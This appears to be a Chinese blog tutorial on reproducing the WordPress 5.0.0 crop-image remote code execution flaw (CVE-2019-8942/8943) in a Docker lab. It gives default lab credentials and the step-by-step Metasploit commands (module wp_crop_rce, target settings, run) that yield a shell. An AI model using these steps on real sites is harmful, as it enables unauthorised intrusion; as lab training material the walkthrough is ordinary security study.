前言:
目前朋友们对“msf 漏洞利用”可能比较讲究,看官们都想要知道一些“msf 漏洞利用”的相关知识。那么小编在网摘上汇集了一些有关“msf 漏洞利用””的相关内容,希望大家能喜欢,同学们一起来学习一下吧!百度有不少WordPress 5.0.0 远程代码执行漏洞分析CVE-2019-8942、CVE-2019-8943漏洞复现的文章,但是唯独没有用MSF的,今天就以此篇文章描述一下如何使用msf利用该漏洞一键拿shell权限!!!
漏洞简介
1、此漏洞是由目录遍历以及本地文件包含两部分组成。
2、想要利用此漏洞,需要在目标WordPress站点上拥有至少作者权限访问帐户。
0x001准备环境
由于我们有自己的靶场环境,为了方便,直接docker 拉取现成靶机环境(感谢Medicean)
$ docker pull medicean/vulapps:w_wordpress_7
类型 用户名 密码
Mysql root root
/wp-admin/ admin admin4wp498
/wp-admin/ Author 需要重新设置
启动环境
$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_7
-p 8000:80 前面的8000代表物理机的端口,可随意指定。
首先登陆Author权限的账户,也就是“作者”账户
默认情况下WordPress后台有5个用户角色
Administrator(管理员)Editor(编辑)Author(作者)Contributor(投稿者)Subscriber(订阅者)
打开:http://你的ip:8000//wp-admin/ ,用admin admin4wp498 登陆重置下Author账户密码
点击作者-编辑-新密码-打钩-更新用户
然后退出账号用Author账户登陆(这个docker镜像,用默认Author admin4wp498无法登陆所以需要重新设置)
0x002准备kali
2019.4 space-r7将 WordPress 5.0.0 - Crop-image Shell Upload更新到Metasploit攻击框架中
方式一:# apt install metasploit-framework 更新msf
方式二:手工下来rb并更新进msf攻击框架中
打开kali,新建窗口输入msfconsole启动msf
输入:search wp_crop_rce (搜索攻击模块)
需要用到的模块为:exploit/multi/http/wp_crop_rce
use exploit/multi/http/wp_crop_rce ##连接模块
输入:show option ##显示模块设置,这里要设置4个名称 USERNAME、PASSWORD、RHOTS、PORT
set USERNAME author ##WordPress的作者账户名set PASSWORD 123456 ##作者账户密码set RHOSTS 192.168.2.152 ##靶机IPset RPORT 8000 ##靶机端口
设置完成后,直接输入 run ,开始自动化拿shell
静等片刻。。。。。。
已拿到shell权限了!!!到这里小伙伴们学会了吗?如果还是没有理解,请私信我吧,或者加入我的圈子《黑客攻防与网络安全实战训练营》
注:网络安全的学习,一定要保证自己的职业道德,学习技术的目标是去维护我们的“信息家园”而不要随意的搞破坏!网络安全靠人民,网络安全为人民!!
标签: #msf 漏洞利用